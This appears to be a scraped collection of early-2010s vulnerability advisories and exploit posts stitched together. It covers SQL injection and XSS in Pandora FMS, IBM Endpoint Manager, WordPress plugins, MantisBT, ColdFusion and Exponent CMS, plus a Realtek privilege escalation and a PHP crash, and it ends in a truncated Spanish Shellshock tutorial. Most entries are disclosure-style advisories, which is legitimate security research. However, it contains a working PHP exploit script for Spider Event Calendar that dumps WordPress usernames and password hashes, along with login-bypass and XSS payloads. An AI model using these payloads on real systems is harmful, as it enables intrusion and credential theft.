HireHackking

Document Title: =============== Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability References (Source): ==================== http://vulnerability-lab.com/get_content.php?id=1355 Release Date: ============= 2015-02-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1355 Common Vulnerability Scoring System: ==================================== 6.3 Product & Service Introduction: =============================== Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ new technology market. * Detect new systems in network. * Checks for availability or performance. * Raise alerts when something goes wrong. * Allow to get data inside systems with its own lite agents (for almost every Operating System). * Allow to get data from outside, using only network probes. Including SNMP. * Get SNMP Traps from generic network devices. * Generate real time reports and graphics. * SLA reporting. * User defined graphical views. * Store data for months, ready to be used on reporting. * Real time graphs for every module. * High availability for each component. * Scalable and modular architecture. * Supports up to 2500 modules per server. * User defined alerts. Also could be used to react on incidents. * Integrated incident manager. * Integrated DB management: purge and DB compaction. * Multiuser, multi profile, multi group. * Event system with user validation for operation in teams. * Granularity of accesses and user profiles for each group and each user. * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003. (Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Artica Sulociones Tecnologicas Product: Pandora FMS - Monitoring Web Application 5.1 SP1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application. The vulnerability allows remote attackers and low privileged application user accounts to unauthorized execute sql commands that compromise the affected monitoring web-application and dbms. The vulnerability is located in the offset value of the index list context module. Remote attackers and low privileged application user accounts are able to execute own sql commands via GET method request. The attacker can prepare a request through the `agentes` module to inject own sql commands on the affected web-application dbms. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 6.3. Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account. Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] agentes [+] agents_modules Vulnerable Parameter(s): [+] offset Proof of Concept (PoC): ======================= The sql injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-- http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-- http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60 http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-- http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-- http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-- http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-- --- SQL Error Session Logs --- SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php - SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php - SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74 - SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74 - SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74 - SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php PoC: Exploit (html & js) <html> <head><body> <title>Pandora FMS - SQL Injection Exploit</title> <iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--> <iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--> <iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60> <iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--> <iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--> <iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--> <iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--> </head></body> </html> ... or <script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D %26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26 group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A //fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20 VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F sec%3Destado%26sec2%3Doperation/agentes Reference(s): http://fms.localhost:8080/pandora/index.php http://fms.localhost:8080/pandora/include/db/mysql.php Solution - Fix & Patch: ======================= The issue can be patched by implementation of a prepared statement thats prevents the execution of sql commands through the weak values. Encode and parse the vulnerable `offset` value in all the marked moduzles to prevent further executions or information disclosure. Security Risk: ============== The security risk of the remote sql injection vulnerabilitiy in the pandora fms application is estimated as high. (CVSS 6.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details ======= Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction ============ IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details ============ Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] <select NAME="url"> [...] <option>http://"><script>alert(/XSS/)</script></option> </select> Proof of Concept ================ http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk ============= As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

###################### # Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss # Date : 2015-02-11 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Vulnerability Disclosure Timeline: 2015-02-08: Discovered vulnerability 2015-02-09: Vendor Notification 2015-02-10: Vendor Response/Feedback 2015-02-10: Vendor Send Fix/Patch 2015-02-11: Public Disclosure # Description Wordpress Video Gallery 2.7 suffers from SQL injection ###################### # PoC http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi] ##################### # Fix/patch sent by apptha's developer File: videogalleryrss.php Change line n.47 from: $vid = filter_input(INPUT_GET,'vid'); to: $vid = intval(filter_input(INPUT_GET,'vid')); ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

source: https://www.securityfocus.com/bid/49207/info Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The following example input is available: Username : ' or 1=1 or ''='' Password: ' or 1=1 or ''=''

<?php /* # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection] # Date: 2015-02-12 # Exploit Author: Mateusz Lach # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip # Version: 1.4.9 # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application. # CVE : CWE-89 # OWASP Top10: A1-Injection This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection] # Date: 2015-02-12 # Exploit Author: Mateusz Lach # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip # Version: 1.4.9 # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application. # CVE : CWE-89 # OWASP Top10: A1-Injection */ define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0'); define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0'); define('FAKE_ID_TO_SEARCH', 12345677654321); define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH); define('PATTERN_TO_SEARCH_USERS', '#!#!#!#'); define('ROW_SEPARATOR', ','); define('FIELD_SEPARATOR', '##'); $server = $_GET['SRV']; if (empty($server)) { echo 'Please put server (without protocol) name in SRV GET variable!'; } else { $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH); $prefixCurl = curl_init($fullURL); curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($prefixCurl); if (stripos($result, PATTERN_TO_SEARCH) !== false) { preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames); $tableName = str_replace('####', '', $tableNames[0]); echo 'tableName: '.$tableName.'<BR/>'; $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName); $usersCurl = curl_init($fullURL); curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($usersCurl); if (stripos($result, PATTERN_TO_SEARCH) !== false) { $from = stripos($result, PATTERN_TO_SEARCH_USERS); $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS)); $result = substr($result, $from, $to-$from); echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>'; } else { echo 'Table name fetched, but not users - try to rewrite exploit :-('; } } else { echo 'NOT vulnerable :-('; } }

###################### # Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies # Discovered by- # Mayuresh Dani (mdani@qualys.com) # Narendra Shinde (nshinde@qualys.com) # Vendor Homepage: http://www.exponentcms.org/ # Software Link: http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download # Version: 2.3.1 # Date: 2014-10-11 # Tested on: Windows 7 / Mozilla Firefox # Ubuntu 14.04 / Mozilla Firefox # CVE: CVE-2014-8690 ###################### # Vulnerability Disclosure Timeline: # 2014-11-04: Discovered vulnerability # 2014-11-04: Vendor Notification # 2014-11-05: Vendor confirmation # 2014-11-06: Vendor fixes Universal XSS - http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0 # 2015-02-12: Public Disclosure ###################### # Description # Exponent CMS is a free, open source, open standards modular enterprise software framework and content management system (CMS) written in the PHP. # # CVE-2014-8690: # Universal XSS - Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts. # Examples: # http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c # http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # # 2.b. XSS in user profiles. # The "First Name" and "Last Name" fields on http://server/exponent/users/edituser are not sufficiently sanitized. Enter your favourite script and the application will execute it everytime for you. # # More information and PoCs - http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior # # # Thanks, # Mayuresh & Narendra

Realtek 11n Wireless LAN utility privilege escalation. Vulnerability Discovered by Humberto Cabrera @dniz0r http://zeroscience.mk @zeroscience Summary: ⁃ Realtek 11n Wireless LAN utility is deployed and used by realtek alfa cards and more in order to help diagnose and view wireless card properties. Description: - Unquoted Privilege escalation that allows a user to gain SYSTEM privileges. Date - 12 Feb 2015 Version: 700.1631.106.2011 Vendor: www.realtek.com.tw Advisory URL: https://eaty0face.wordpress.com/2015/02/13/realtek-11n-wireless-lan-utility-privilege-escalation/ Tested on: Win7 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: realtek11ncu TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\REALTEK\11n USB Wireless LAN Utility\RtlService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Realtek11nCU DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Windows\system32>sc qc realtek11nsu [SC] QueryServiceConfig SUCCESS SERVICE_NAME: realtek11nsu TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\REALTEK\Wireless LAN Utility\RtlService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Realtek11nSU DEPENDENCIES : SERVICE_START_NAME : LocalSystem

source: https://www.securityfocus.com/bid/49208/info Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/CS0106/category.asp?cat=[sqli]

source: https://www.securityfocus.com/bid/49209/info Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/CS0077/main.asp?key=[sqli]

source: https://www.securityfocus.com/bid/49210/info Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]

source: https://www.securityfocus.com/bid/49235/info MantisBT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MantisBT 1.2.6 is vulnerable; other versions may also be affected. http://www.example.com/path/search.php?project_id=[XSS] http://www.example.com/path/core.php?mbadmin=[SQL]

source: https://www.securityfocus.com/bid/49249/info PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. An attacker can exploit these issues to cause an application written in PHP to crash, denying service to legitimate users. PHP 5.3.7 is vulnerable; other versions may also be affected. 127# ulimit -m 100000 127# ulimit -v 100000 127# cat /www/strtotime.php <?php $strx=str_repeat("A",$argv[1]); var_dump(strtotime($strx)); ?>127# 127# /cxib/5371/build/bin/php /www/strtotime.php 33388888 Memory fault (core dumped) 127# gdb -q /cxib/5371/build/bin/php (gdb) r /www/strtotime.php 33388888 Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888 Program received signal SIGSEGV, Segmentation fault. 0x0806e8bd in add_error (s=0xbfbfcf90, error=0x83ea7d8 "Double timezone specification") at /cxib/5371/ext/date/lib/parse_date.c:355 355 s->errors->error_messages[s->errors->error_count - 1].position = s->tok ? s->tok - s->str : 0; (gdb) print s->errors->error_messages $1 = (struct timelib_error_message *) 0x0 (gdb) print s->errors->error_count $2 = 1835009

source: https://www.securityfocus.com/bid/49220/info Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>

Shellshock es una vulnerabilidad asociada al CVE-2014-6271 que salió el 24 de septiembre de 2014 y afecta a la shell de Linux «Bash» hasta la versión 4.3. Esta vulnerabilidad permite una ejecución arbitraria de comandos. Índice: Origen de ShellshockShellshock RemotoEjemplo de Explotación RemotaReferencias Origen de Shellshock La vulnerabilidad se originaba porque antes, a la hora de asignar una variable de entorno, bash te daba la posibilidad de asignar una función. Lo que ocurría cuando asignabas una función en el valor de una variable de entorno es que bash no se detenía en la propia definición, sino que continuaba y ejecutaba los comandos que se pusieran después de la definición de la función. Literalmente tú después de leer este párrafo: Ahora todo quedará más claro. Lo que ocurría antes es que tú podías declarar una función en una variable de entorno. Y ocurría un bug, que hacía que se ejecutara el comando que se colocase después. Por ejemplo, tú definías la siguiente funcion en la variable: variable='() { contenido de la función;}; ‘ Y en vez de simplemente definirse, el bug que tenía bash ocasionaba que se ejecutase el comando que hubiese después de la definición de la función. A nivel de concepto, esto es todo. Para entender mejor esta vulnerabilidad, vamos a ver como funciona el comando env. Este comando imprime las variables de entornos actuales. Pero también se puede usar para ejecutar un comando en un entorno con una variable especificada. El proceso que hace es el siguiente: env empieza un nuevo procesoModifica el entorno de este nuevo procesoEjecuta el comando que hemos dicho en el entorno creado Por ejemplo, si pasamos como argumento el comando env para que se ejecute en el entorno que te crea el primer env, podremos ver las variables de entorno del contexto que crea el primer env: Digamos que lo que está ocurriendo es: «Oye, créame un entorno completamente limpio de variables de entorno. En este entorno la única variable de entorno que habrá será la que yo pase como argumento. Y dentro de 